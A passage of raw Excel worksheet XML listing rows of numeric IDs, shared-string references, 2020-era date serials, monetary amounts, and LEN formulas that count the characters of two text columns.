        <f>LEN(I17)</f>
        <v>60</v>
      </c>
      <c r="L17">
        <f>LEN(J17)</f>
        <v>158</v>
      </c>
    </row>
    <row r="18" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>20813</v>
      </c>
      <c r="B18">
        <v>2675</v>
      </c>
      <c r="C18" t="s">
        <v>6012</v>
      </c>
      <c r="D18" t="s">
        <v>11002</v>
      </c>
      <c r="E18">
        <v>26</v>
      </c>
      <c r="F18" t="s">
        <v>11003</v>
      </c>
      <c r="G18" s="1">
        <v>44011</v>
      </c>
      <c r="H18">
        <v>360000</v>
      </c>
      <c r="I18" t="s">
        <v>9693</v>
      </c>
      <c r="J18" t="s">
        <v>11004</v>
      </c>
      <c r="K18">
        <f>LEN(I18)</f>
        <v>33</v>
      </c>
      <c r="L18">
        <f>LEN(J18)</f>
        <v>158</v>
      </c>
    </row>
    <row r="19" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>20103</v>
      </c>
      <c r="B19">
        <v>46</v>
      </c>
      <c r="C19" t="s">
        <v>658</v>
      </c>
      <c r="D19" t="s">
        <v>10470</v>
      </c>
      <c r="E19">
        <v>12</v>
      </c>
      <c r="F19" t="s">
        <v>10473</v>
      </c>
      <c r="G19" s="1">
        <v>43928</v>
      </c>
      <c r="H19">
        <v>600000</v>
      </c>
      <c r="J19" t="s">
        <v>10474</v>
      </c>
      <c r="K19">
        <f>LEN(I19)</f>
        <v>0</v>
      </c>
      <c r="L19">
        <f>LEN(J19)</f>
        <v>154</v>
      </c>
    </row>
    <row r="20" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>20816</v>
      </c>
      <c r="B20">
        <v>2675</v>
      </c>
      <c r="C20" t="s">
        <v>6012</v>
      </c>
      <c r="D20" t="s">
        <v>11002</v>
      </c>
      <c r="E20">
        <v>26</v>
      </c>
      <c r="F20" t="s">
        <v>9577</v>
      </c>
      <c r="G20" s="1">
        <v>44011</v>
      </c>
      <c r="H20">
        <v>360000</v>
      </c>
      <c r="I20" t="s">
        <v>11006</v>
      </c>
      <c r="J20" t="s">
        <v>11009</v>
      </c>
      <c r="K20">
        <f>LEN(I20)</f>
        <v>76</v>
      </c>
      <c r="L20">
        <f>LEN(J20)</f>
        <v>150</v>
      </c>
    </row>
    <row r="21" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>20102</v>
      </c>
      <c r="B21">
        <v>46</v>
      </c>
      <c r="C21" t="s">
        <v>658</v>
      </c>
      <c r="D21" t="s">
        <v>10470</v>
      </c>
      <c r="E21">
        <v>12</v>
      </c>
      <c r="F21" t="s">
        <v>2236</v>
      </c>
      <c r="G21" s="1">
        <v>43928</v>
      </c>
      <c r="H21">
        <v>300000</v>
      </c>
      <c r="J21" t="s">
        <v>10472</v>
      </c>
      <c r="K21">
        <f>LEN(I21)</f>
        <v>0</v>
      </c>
      <c r="L21">
        <f>LEN(J21)</f>
        <v>148</v>
      </c>
    </row>
    <row r="22" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>20738</v>
      </c>
      <c r="B22">
        <v>888</v>
      </c>
      <c r="C22" t="s">
        <v>3000</v>
      </c>
      <c r="D22" t="s">
        <v>10947</v>
      </c>
      <c r="E22">
        <v>12</v>
      </c>
      <c r="F22" t="s">
        <v>609</v>
      </c>
      <c r="G22" s="1">
        <v>43984</v>
      </c>
      <c r="H22">
        <v>3646890</v>
      </c>
      <c r="I22" t="s">
        <v>10948</v>
      </c>
      <c r="J22" t="s">
        <v>10949</v>
      </c>
      <c r="K22">
        <f>LEN(I22)</f>
        <v>150</v>
      </c>
      <c r="L22">
        <f>LEN(J22)</f>
        <v>146</v>
      </c>
    </row>
    <row r="23" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>18354</v>
      </c>
      <c r="B23">
        <v>2031</v>
      </c>
      <c r="C23" t="s">
        <v>16279</v>
      </c>
      <c r="D23" t="s">
        <v>16280</v>
      </c>
      <c r="E23">
        <v>12</v>
      </c>
      <c r="F23" t="s">
        <v>9838</v>
      </c>
      <c r="G23" s="1">
        <v>44025</v>
      </c>
      <c r="H23" s="4">
        <v>100000</v>
      </c>
      <c r="I23" t="s">
        <v>9839</v>
      </c>
      <c r="J23" t="s">
        <v>9840</v>
      </c>
      <c r="K23">
        <f>LEN(I23)</f>
        <v>90</v>
      </c>
      <c r="L23">
        <f>LEN(J23)</f>
        <v>145</v>
      </c>
    </row>
    <row r="24" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>18355</v>
      </c>
      <c r="B24">
        <v>2031</v>
      </c>
      <c r="C24" t="s">
        <v>16279</v>
      </c>
      <c r="D24" t="s">
        <v>16280</v>
      </c>
      <c r="E24">
        <v>12</v>
      </c>
      <c r="F24" t="s">
        <v>9458</v>
      </c>
      <c r="G24" s="1">
        <v>44025</v>
      </c>
      <c r="H24" s="4">
        <v>120000</v>
      </c>
      <c r="I24" t="s">
        <v>9841</v>
      </c>
      <c r="J24" t="s">
        <v>9840</v>
      </c>
      <c r="K24">
        <f>LEN(I24)</f>
        <v>47</v>
      </c>
      <c r="L24">
        <f>LEN(J24)</f>
        <v>145</v>
      </c>
    </row>
    <row r="25" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>21106</v>
      </c>
      <c r="B25">
        <v>500</v>
      </c>
      <c r="C25" t="s">
        <v>625</v>
      </c>
      <c r="D25" t="s">
        <v>9803</v>
      </c>
      <c r="E25">
        <v>11</v>
      </c>
      <c r="F25" t="s">
        <v>11144</v>
      </c>
      <c r="G25" s="1">
        <v>44012</v>
      </c>
      <c r="H25">
        <v>10000</v>
      </c>
      <c r="J25" t="s">
        <v>11145</v>
      </c>
      <c r="K25">
        <f>LEN(I25)</f>
        <v>0</v>
      </c>
      <c r="L25">
        <f>LEN(J25)</f>
        <v>144</v>
      </c>
    </row>
    <row r="26" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>21108</v>
      </c>
      <c r="B26">
        <v>500</v>
      </c>
      <c r="C26" t="s">
        <v>625</v>
      </c>
      <c r="D26" t="s">
        <v>9803</v>
      </c>
      <c r="E26">
        <v>11</v>
      </c>
      <c r="F26" t="s">
        <v>3814</v>
      </c>
      <c r="G26" s="1">
        <v>44012</v>
      </c>
      <c r="H26">
        <v>15000</v>
      </c>
      <c r="J26" t="s">
        <v>11145</v>
      </c>
      <c r="K26">
        <f>LEN(I26)</f>
        <v>0</v>
      </c>
      <c r="L26">
        <f>LEN(J26)</f>
        <v>144</v>
      </c>
    </row>
    <row r="27" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>21110</v>
      </c>
      <c r="B27">
        <v>500</v>
      </c>
      <c r="C27" t="s">
        <v>625</v>
      </c>
      <c r="D27" t="s">
        <v>9803</v>
      </c>
      <c r="E27">
        <v>11</v>
      </c>
      <c r="F27" t="s">
        <v>4686</v>
      </c>
      <c r="G27" s="1">
        <v>44012</v>
      </c>
      <c r="H27">
        <v>20000</v>
      </c>
      <c r="J27" t="s">
        <v>11145</v>
      </c>
      <c r="K27">
        <f>LEN(I27)</f>
        <v>0</v>
      </c>
      <c r="L27">
        <f>LEN(J27)</f>
        <v>144</v>
      </c>
    </row>
    <row r="28" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>21111</v>
      </c>
      <c r="B28">
        <v>500</v>
      </c>
      <c r="C28" t="s">
        <v>625</v>
      </c>
      <c r="D28" t="s">
        <v>9803</v>
      </c>
      <c r="E28">
        <v>11</v>
      </c>
      <c r="F28" t="s">
        <v>9532</v>
      </c>
      <c r="G28" s="1">
        <v>44012</v>
      </c>
      <c r="H28">
        <v>20000</v>
      </c>
      <c r="J28" t="s">
        <v>11145</v>
      </c>
      <c r="K28">
        <f>LEN(I28)</f>
        <v>0</v>
      </c>
      <c r="L28">
        <f>LEN(J28)</f>
        <v>144</v>
      </c>
    </row>
    <row r="29" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>21112</v>
      </c>
      <c r="B29">
        <v>500</v>
      </c>
      <c r="C29" t="s">
        <v>625</v>
      </c>
      <c r="D29" t="s">
        <v>9803</v>
      </c>
      <c r="E29">
        <v>11</v>
      </c>
      <c r="F29" t="s">
        <v>9640</v>
      </c>
      <c r="G29" s="1">
        <v>44012</v>
      </c>
      <c r="H29">
        <v>10000</v>
      </c>
      <c r="J29" t="s">
        <v>11145</v>
      </c>
      <c r="K29">
        <f>LEN(I29)</f>
        <v>0</v>
      </c>
      <c r="L29">
        <f>LEN(J29)</f>
        <v>144</v>
      </c>
    </row>
    <row r="30" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>21113</v>
      </c>
      <c r="B30">
        <v>500</v>
      </c>
      <c r="C30" t="s">
        <v>625</v>
      </c>
      <c r="D30" t="s">
        <v>9803</v>
      </c>
      <c r="E30">
        <v>11</v>
      </c>
      <c r="F30" t="s">
        <v>9675</v>
      </c>
      <c r="G30" s="1">
        <v>44012</v>
      </c>
      <c r="H30">
        <v>10000</v>
      </c>
      <c r="J30" t="s">
        <v>11145</v>
      </c>
      <c r="K30">
        <f>LEN(I30)</f>
        <v>0</v>
      </c>
      <c r="L30">
        <f>LEN(J30)</f>
        <v>144</v>
      </c>
    </row>
    <row r="31" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>21114</v>
      </c>
      <c r="B31">
        <v>500</v>
      </c>
      <c r="C31" t="s">
        <v>625</v>
      </c>
      <c r="D31" t="s">
        <v>9803</v>
      </c>
      <c r="E31">
        <v>11</v>
      </c>
      <c r="F31" t="s">
        <v>11147</v>
      </c>
      <c r="G31" s="1">
        <v>44012</v>
      </c>
      <c r="H31">
        <v>25000</v>
      </c>
      <c r="J31" t="s">
        <v>11145</v>
      </c>
      <c r="K31">
        <f>LEN(I31)</f>
        <v>0</v>
      </c>
      <c r="L31">
        <f>LEN(J31)</f>
        <v>144</v>
      </c>
    </row>
    <row r="32" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>17022</v>
      </c>
      <c r="B32">
        <v>459</v>
      </c>
      <c r="C32" t="s">
        <v>1143</v>
      </c>
      <c r="D32" t="s">
        <v>9627</v>
      </c>
      <c r="E32">
        <v>16</v>
      </c>
      <c r="F32" t="s">
        <v>9628</v>
      </c>
      <c r="G32" s="1">
        <v>43935</v>
      </c>
      <c r="H32">
        <v>4680000</v>
      </c>
      <c r="J32" t="s">
        <v>9629</v>
      </c>
      <c r="K32">
        <f>LEN(I32)</f>
        <v>0</v>
      </c>
      <c r="L32">
        <f>LEN(J32)</f>
        <v>140</v>
      </c>
    </row>
    <row r="33" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>20213</v>
      </c>
      <c r="B33">
        <v>2278</v>
      </c>
      <c r="C33" t="s">
        <v>4811</v>
      </c>
      <c r="D33" t="s">
        <v>10554</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" t="s">
        <v>1746</v>
      </c>
      <c r="G33" s="1">
        <v>44039</v>
      </c>
      <c r="H33">
        <v>73000</v>
      </c>
      <c r="I33" t="s">
        <v>10559</v>
      </c>
      <c r="J33" t="s">
        <v>10556</v>
      </c>
      <c r="K33">
        <f>LEN(I33)</f>
        <v>34</v>
      </c>
      <c r="L33">
        <f>LEN(J33)</f>
        <v>139</v>
      </c>
    </row>
    <row r="34" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>20214</v>
      </c>
      <c r="B34">
        <v>2278</v>
      </c>
      <c r="C34" t="s">
        <v>4811</v>
      </c>
      <c r="D34" t="s">
        <v>10554</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" t="s">
        <v>3814</v>
      </c>
      <c r="G34" s="1">
        <v>44039</v>
      </c>
      <c r="H34">
        <v>6000</v>
      </c>
      <c r="I34" t="s">
        <v>10559</v>
      </c>
      <c r="J34" t="s">
        <v>10556</v>
      </c>
      <c r="K34">
        <f>LEN(I34)</f>
        <v>34</v>
      </c>
      <c r="L34">
        <f>LEN(J34)</f>
        <v>139</v>
      </c>
    </row>
    <row r="35" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A35">
        <v>20210</v>
      </c>
      <c r="B35">
        <v>2278</v>
      </c>
      <c r="C35" t="s">
        <v>4811</v>
      </c>
      <c r="D35" t="s">
        <v>10554</v>
      </c>
      <c r="E35">
        <v>1</v>
      </c>
      <c r="F35" t="s">
        <v>10555</v>
      </c>
      <c r="G35" s="1">
        <v>44039</v>
      </c>
      <c r="H35">
        <v>12000</v>
      </c>
      <c r="I35" t="s">
        <v>9550</v>
      </c>
      <c r="J35" t="s">
        <v>10556</v>
      </c>
      <c r="K35">
        <f>LEN(I35)</f>
        <v>18</v>
      </c>
      <c r="L35">
        <f>LEN(J35)</f>
        <v>139</v>
      </c>
    </row>
    <row r="36" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A36">
        <v>20211</v>
      </c>
      <c r="B36">
        <v>2278</v>
      </c>
      <c r="C36" t="s">
        <v>4811</v>
      </c>
      <c r="D36" t="s">
        <v>10554</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" t="s">
        <v>10557</v>
      </c>
      <c r="G36" s="1">
        <v>44039</v>
      </c>
      <c r="H36">
        <v>12000</v>
      </c>
      <c r="I36" t="s">
        <v>9550</v>
      </c>
      <c r="J36" t="s">
        <v>10556</v>
      </c>
      <c r="K36">
        <f>LEN(I36)</f>
        <v>18</v>
      </c>
      <c r="L36">
        <f>LEN(J36)</f>
        <v>139</v>
      </c>
    </row>
    <row r="37" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A37">
        <v>20212</v>
      </c>
      <c r="B37">
        <v>2278</v>
      </c>
      <c r="C37" t="s">
        <v>4811</v>
      </c>
      <c r="D37" t="s">
        <v>10554</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37" t="s">
        <v>10558</v>
      </c>
      <c r="G37" s="1">
        <v>44039</v>
      </c>
      <c r="H37">
        <v>50000</v>
      </c>
      <c r="I37" t="s">
        <v>9550</v>
      </c>
      <c r="J37" t="s">
        <v>10556</v>
      </c>
      <c r="K37">
        <f>LEN(I37)</f>
        <v>18</v>
      </c>
      <c r="L37">
        <f>LEN(J37)</f>
        <v>139</v>
      </c>
    </row>
    <row r="38" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A38">
        <v>20215</v>
      </c>
      <c r="B38">
        <v>2278</v>
      </c>
      <c r="C38" t="s">
        <v>4811</v>
      </c>
      <c r="D38" t="s">
        <v>10554</v>
      </c>
      <c r="E38">
        <v>1</v>
      </c>
      <c r="F38" t="s">
        <v>9523</v>
      </c>
      <c r="G38" s="1">
        <v>44039</v>
      </c>
      <c r="H38">
        <v>1200</v>
      </c>
      <c r="I38" t="s">
        <v>9550</v>
      </c>
      <c r="J38" t="s">
        <v>10556</v>
      </c>
      <c r="K38">
        <f>LEN(I38)</f>
        <v>18</v>
      </c>
      <c r="L38">
        <f>LEN(J38)</f>
        <v>139</v>
      </c>
    </row>
    <row r="39" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A39">
        <v>20216</v>
      </c>
      <c r="B39">
        <v>2278</v>
      </c>
      <c r="C39" t="s">
        <v>4811</v>
      </c>
      <c r="D39" t="s">
        <v>10554</v>
      </c>
      <c r="E39">
        <v>1</v>
      </c>
      <c r="F39" t="s">
        <v>9675</v>
      </c>
      <c r="G39" s="1">
        <v>44039</v>
      </c>
      <c r="H39">
        <v>1000</v>
      </c>
      <c r="I39" t="s">
        <v>9550</v>
      </c>
      <c r="J39" t="s">
        <v>10556</v>
      </c>
      <c r="K39">
        <f>LEN(I39)</f>
        <v>18</v>
      </c>
      <c r="L39">
        <f>LEN(J39)</f>
        <v>139</v>
      </c>
    </row>
    <row r="40" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A40">
        <v>20217</v>
      </c>
      <c r="B40">
        <v>2278</v>
      </c>
      <c r="C40" t="s">
        <v>4811</v>
      </c>
      <c r="D40" t="s">
        <v>10554</v>
      </c>
      <c r="E40">
        <v>1</v>
      </c>
      <c r="F40" t="s">
        <v>9722</v>
      </c>
      <c r="G40" s="1">
        <v>44039</v>
      </c>
      <c r="H40">
        <v>120000</v>
      </c>
      <c r="I40" t="s">
        <v>9550</v>
      </c>
      <c r="J40" t="s">
        <v>10556</v>
      </c>
      <c r="K40">
        <f>LEN(I40)</f>
        <v>18</v>
      </c>
      <c r="L40">
        <f>LEN(J40)</f>
        <v>139</v>
      </c>
    </row>
    <row r="41" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A41">
        <v>20218</v>
      </c>
      <c r="B41">
        <v>2278</v>
      </c>
      <c r="C41" t="s">
        <v>4811</v>
      </c>
      <c r="D41" t="s">
        <v>10554</v>
      </c>
      <c r="E41">
        <v>1</v>
      </c>
      <c r="F41" t="s">
        <v>9640</v>
      </c>
      <c r="G41" s="1">
        <v>44039</v>
      </c>
      <c r="H41">
        <v>24000</v>
      </c>
      <c r="I41" t="s">
        <v>9550</v>
      </c>
      <c r="J41" t="s">
        <v>10556</v>
      </c>
      <c r="K41">
        <f>LEN(I41)</f>
        <v>18</v>
      </c>
      <c r="L41">
        <f>LEN(J41)</f>
        <v>139</v>
      </c>
    </row>
    <row r="42" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A42">
        <v>19958</v>
      </c>
      <c r="B42">
        <v>206</v>
      </c>
      <c r="C42" t="s">
        <v>188</v>
      </c>
      <c r="D42" t="s">
        <v>10349</v>
      </c>
      <c r="E42">
        <v>31</v>
      </c>
      <c r="F42" t="s">
        <v>10352</v>
      </c>
      <c r="G42" s="1">
        <v>43986</v>
      </c>
      <c r="H42">
        <v>40000</v>
      </c>
      <c r="I42" t="s">
        <v>9693</v>
      </c>
      <c r="J42" t="s">
        <v>10353</v>
      </c>
      <c r="K42">
        <f>LEN(I42)</f>
        <v>33</v>
      </c>
      <c r="L42">
        <f>LEN(J42)</f>
        <v>135</v>
      </c>
    </row>
    <row r="43" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A43">
        <v>19959</v>
      </c>
      <c r="B43">
        <v>206</v>
      </c>
      <c r="C43" t="s">
        <v>188</v>
      </c>
      <c r="D43" t="s">
        <v>10349</v>
      </c>
      <c r="E43">
        <v>31</v>
      </c>
      <c r="F43" t="s">
        <v>10354</v>
      </c>
      <c r="G43" s="1">
        <v>43986</v>
      </c>
      <c r="H43">
        <v>20000</v>
      </c>
      <c r="I43" t="s">
        <v>9693</v>
      </c>
      <c r="J43" t="s">
        <v>10353</v>
      </c>
      <c r="K43">
        <f>LEN(I43)</f>
        <v>33</v>
      </c>
      <c r="L43">
        <f>LEN(J43)</f>
        <v>135</v>
      </c>
    </row>
    <row r="44" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A44">
        <v>19960</v>
      </c>
      <c r="B44">
        <v>206</v>
      </c>
      <c r="C44" t="s">
        <v>188</v>
      </c>
      <c r="D44" t="s">
        <v>10349</v>
      </c>
      <c r="E44">
        <v>31</v>
      </c>
      <c r="F44" t="s">
        <v>3763</v>
      </c>
      <c r="G44" s="1">
        <v>43986</v>
      </c>
      <c r="H44">
        <v>0</v>
      </c>
      <c r="I44" t="s">
        <v>9693</v>
      </c>
      <c r="J44" t="s">
        <v>10353</v>
      </c>
      <c r="K44">
        <f>LEN(I44)</f>
        <v>33</v>
      </c>
      <c r="L44">
        <f>LEN(J44)</f>
        <v>135</v>
      </c>
    </row>
    <row r="45" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A45">
        <v>18353</v>
      </c>
      <c r="B45">
        <v>2031</v>
      </c>
      <c r="C45" t="s">
        <v>16279</v>
      </c>
      <c r="D45" t="s">
        <v>16280</v>
      </c>
      <c r="E45">
        <v>12</v>
      </c>
      <c r="F45" t="s">
        <v>9453</v>
      </c>
      <c r="G45" s="1">
        <v>44025</v>
      </c>
      <c r="H45" s="4">
        <v>5000</v>
      </c>
      <c r="I45" t="s">
        <v>9836</v>
      </c>
      <c r="J45" t="s">
        <v>9837</v>
      </c>
      <c r="K45">
        <f>LEN(I45)</f>
        <v>48</v>
      </c>
      <c r="L45">
        <f>LEN(J45)</f>
        <v>134</v>
      </c>
    </row>
    <row r="46" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A46">
        <v>21107</v>
      </c>
      <c r="B46">
        <v>500</v>
      </c>
      <c r="C46" t="s">
        <v>625</v>
      </c>
      <c r="D46" t="s">
        <v>9803</v>
      </c>
      <c r="E46">
        <v>11</v>
      </c>
      <c r="F46" t="s">
        <v>9674</v>
      </c>
      <c r="G46" s="1">
        <v>44012</v>
      </c>
      <c r="H46">
        <v>10000</v>
      </c>
      <c r="J46" t="s">
        <v>11146</v>
      </c>
      <c r="K46">
        <f>LEN(I46)</f>
        <v>0</v>
      </c>
      <c r="L46">
        <f>LEN(J46)</f>
        <v>134</v>
      </c>
    </row>
    <row r="47" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A47">
        <v>21300</v>
      </c>
      <c r="B47">
        <v>2619</v>
      </c>
      <c r="C47" t="s">
        <v>5620</v>
      </c>
      <c r="D47" t="s">
        <v>11277</v>
      </c>
      <c r="E47">
        <v>31</v>
      </c>
      <c r="F47" t="s">
        <v>3763</v>
      </c>
      <c r="G47" s="1">
        <v>44081</v>
      </c>
      <c r="H47">
        <v>60000</v>
      </c>
      <c r="I47" t="s">
        <v>11278</v>
      </c>
      <c r="J47" t="s">
        <v>11280</v>
      </c>
      <c r="K47">
        <f>LEN(I47)</f>
        <v>218</v>
      </c>
      <c r="L47">
        <f>LEN(J47)</f>
        <v>131</v>
      </c>
    </row>
    <row r="48" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A48">
        <v>20814</v>
      </c>
      <c r="B48">
        <v>2675</v>
      </c>
      <c r="C48" t="s">
        <v>6012</v>
      </c>
      <c r="D48" t="s">
        <v>11002</v>
      </c>
      <c r="E48">
        <v>26</v>
      </c>
      <c r="F48" t="s">
        <v>11005</v>
      </c>
      <c r="G48" s="1">
        <v>44011</v>
      </c>
      <c r="H48">
        <v>120000</v>
      </c>
      <c r="I48" t="s">
        <v>11006</v>
      </c>
      <c r="J48" t="s">
        <v>11007</v>
      </c>
      <c r="K48">
        <f>LEN(I48)</f>
        <v>76</v>
      </c>
      <c r="L48">
        <f>LEN(J48)</f>
        <v>131</v>
      </c>
    </row>
    <row r="49" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A49">
        <v>20758</v>
      </c>
      <c r="B49">
        <v>2559</v>
      </c>
      <c r="C49" t="s">
        <v>16281</v>
      </c>
      <c r="D49" t="s">
        <v>16282</v>
      </c>
      <c r="E49">
        <v>2</v>
      </c>
      <c r="F49" t="s">
        <v>9217</v>
      </c>
      <c r="G49" s="1">
        <v>43992</v>
      </c>
      <c r="H49" s="4">
        <v>20000</v>
      </c>
      <c r="J49" t="s">
        <v>10958</v>
      </c>
      <c r="K49">
        <f>LEN(I49)</f>
        <v>0</v>
      </c>
      <c r="L49">
        <f>LEN(J49)</f>
        <v>131</v>
      </c>
    </row>
    <row r="50" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A50">
        <v>20759</v>
      </c>
      <c r="B50">
        <v>2559</v>
      </c>
      <c r="C50" t="s">
        <v>4986</v>
      </c>
      <c r="D50" t="s">
        <v>9956</v>
      </c>
      <c r="E50">
        <v>2</v>
      </c>
      <c r="F50" t="s">
        <v>7211</v>
      </c>
      <c r="G50" s="1">
        <v>43992</v>
      </c>
      <c r="H50">
        <v>100000</v>
      </c>
      <c r="J50" t="s">
        <v>10958</v>
      </c>
      <c r="K50">
        <f>LEN(I50)</f>
        <v>0</v>
      </c>
      <c r="L50">
        <f>LEN(J50)</f>
        <v>131</v>
      </c>
    </row>
    <row r="51" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A51">
        <v>20109</v>
      </c>
      <c r="B51">
        <v>46</v>
      </c>
      <c r="C51" t="s">
        <v>658</v>
      </c>
      <c r="D51" t="s">
        <v>10470</v>
      </c>
      <c r="E51">
        <v>12</v>
      </c>
      <c r="F51" t="s">
        <v>10479</v>
      </c>
      <c r="G51" s="1">
        <v>43928</v>
      </c>
      <c r="H51">
        <v>100000</v>
      </c>
      <c r="J51" t="s">
        <v>10480</v>
      </c>
      <c r="K51">
        <f>LEN(I51)</f>
        <v>0</v>
      </c>
      <c r="L51">
        <f>LEN(J51)</f>
        <v>126</v>
      </c>
    </row>
    <row r="52" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A52">
        <v>19374</v>
      </c>
      <c r="B52">
        <v>2559</v>
      </c>
      <c r="C52" t="s">
        <v>16281</v>
      </c>
      <c r="D52" t="s">
        <v>16282</v>
      </c>
      <c r="E52">
        <v>2</v>
      </c>
      <c r="F52" t="s">
        <v>5434</v>
      </c>
      <c r="G52" s="1">
        <v>43906</v>
      </c>
      <c r="H52" s="4">
        <v>300000</v>
      </c>
      <c r="J52" t="s">
        <v>9977</v>
      </c>
      <c r="K52">
        <f>LEN(I52)</f>
        <v>0</v>
      </c>
      <c r="L52">
        <f>LEN(J52)</f>
        <v>121</v>
      </c>
    </row>
    <row r="53" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A53">
        <v>19375</v>
      </c>
      <c r="B53">
        <v>2559</v>
      </c>
      <c r="C53" t="s">
        <v>16281</v>
      </c>
      <c r="D53" t="s">
        <v>16282</v>
      </c>
      <c r="E53">
        <v>2</v>
      </c>
      <c r="F53" t="s">
        <v>9552</v>
      </c>
      <c r="G53" s="1">
        <v>43906</v>
      </c>
      <c r="H53" s="4">
        <v>300000</v>
      </c>
      <c r="J53" t="s">
        <v>9977</v>
      </c>
      <c r="K53">
        <f>LEN(I53)</f>
        <v>0</v>
      </c>
      <c r="L53">
        <f>LEN(J53)</f>
        <v>121</v>
      </c>
    </row>
    <row r="54" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A54">
        <v>19993</v>
      </c>
      <c r="B54">
        <v>2559</v>
      </c>
      <c r="C54" t="s">
        <v>4986</v>
      </c>
      <c r="D54" t="s">
        <v>9956</v>
      </c>
      <c r="E54">
        <v>2</v>
      </c>
      <c r="F54" t="s">
        <v>10387</v>
      </c>
      <c r="G54" s="1">
        <v>43906</v>
      </c>
      <c r="H54">
        <v>10000</v>
      </c>
      <c r="J54" t="s">
        <v>10388</v>
      </c>
      <c r="K54">
        <f>LEN(I54)</f>
        <v>0</v>
      </c>
      <c r="L54">
        <f>LEN(J54)</f>
        <v>121</v>
      </c>
    </row>
    <row r="55" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A55">
        <v>20021</v>
      </c>
      <c r="B55">
        <v>990</v>
      </c>
      <c r="C55" t="s">
        <v>2847</v>
      </c>
      <c r="D55" t="s">
        <v>10401</v>
      </c>
      <c r="E55">
        <v>9</v>
      </c>
      <c r="F55" t="s">
        <v>673</v>
      </c>
      <c r="G55" s="1">
        <v>43889</v>
      </c>
      <c r="H55">
        <v>450000</v>
      </c>
      <c r="J55" t="s">
        <v>10402</v>
      </c>
      <c r="K55">
        <f>LEN(I55)</f>
        <v>0</v>
      </c>
      <c r="L55">
        <f>LEN(J55)</f>
        <v>121</v>
      </c>
    </row>
    <row r="56" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A56">
        <v>20538</v>
      </c>
      <c r="B56">
        <v>2718</v>
      </c>
      <c r="C56" t="s">
        <v>6936</v>
      </c>
      <c r="D56" t="s">
        <v>10784</v>
      </c>
      <c r="E56">
        <v>26</v>
      </c>
      <c r="F56" t="s">
        <v>3814</v>
      </c>
      <c r="G56" s="1">
        <v>43921</v>
      </c>
      <c r="H56">
        <v>1000</v>
      </c>
      <c r="J56" t="s">
        <v>10785</v>
      </c>
      <c r="K56">
        <f>LEN(I56)</f>
        <v>0</v>
      </c>
      <c r="L56">
        <f>LEN(J56)</f>
        <v>121</v>
      </c>
    </row>
    <row r="57" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A57">
        <v>20539</v>
      </c>
      <c r="B57">
        <v>2718</v>
      </c>
      <c r="C57" t="s">
        <v>6936</v>
      </c>
      <c r="D57" t="s">
        <v>10784</v>
      </c>
      <c r="E57">
        <v>26</v>
      </c>
      <c r="F57" t="s">
        <v>10786</v>
      </c>
      <c r="G57" s="1">
        <v>43921</v>
      </c>
      <c r="H57">
        <v>200000</v>
      </c>
      <c r="J57" t="s">
        <v>10785</v>
      </c>
      <c r="K57">
        <f>LEN(I57)</f>
        <v>0</v>
      </c>
      <c r="L57">
        <f>LEN(J57)</f>
        <v>121</v>
      </c>
    </row>
    <row r="58" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A58">
        <v>21243</v>
      </c>
      <c r="B58">
        <v>4775</v>
      </c>
      <c r="C58" t="s">
        <v>7147</v>
      </c>
      <c r="D58" t="s">
        <v>11239</v>
      </c>
      <c r="E58">
        <v>16</v>
      </c>
      <c r="F58" t="s">
        <v>11240</v>
      </c>
      <c r="G58" s="1">
        <v>44041</v>
      </c>
      <c r="H58">
        <v>800000</v>
      </c>
      <c r="I58" t="s">
        <v>11241</v>
      </c>
      <c r="J58" t="s">
        <v>11242</v>
      </c>
      <c r="K58">
        <f>LEN(I58)</f>
        <v>91</v>
      </c>
      <c r="L58">
        <f>LEN(J58)</f>
        <v>119</v>
      </c>
    </row>
    <row r="59" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A59">
        <v>21244</v>
      </c>
      <c r="B59">
        <v>4775</v>
      </c>
      <c r="C59" t="s">
        <v>7147</v>
      </c>
      <c r="D59" t="s">
        <v>11239</v>
      </c>
      <c r="E59">
        <v>16</v>
      </c>
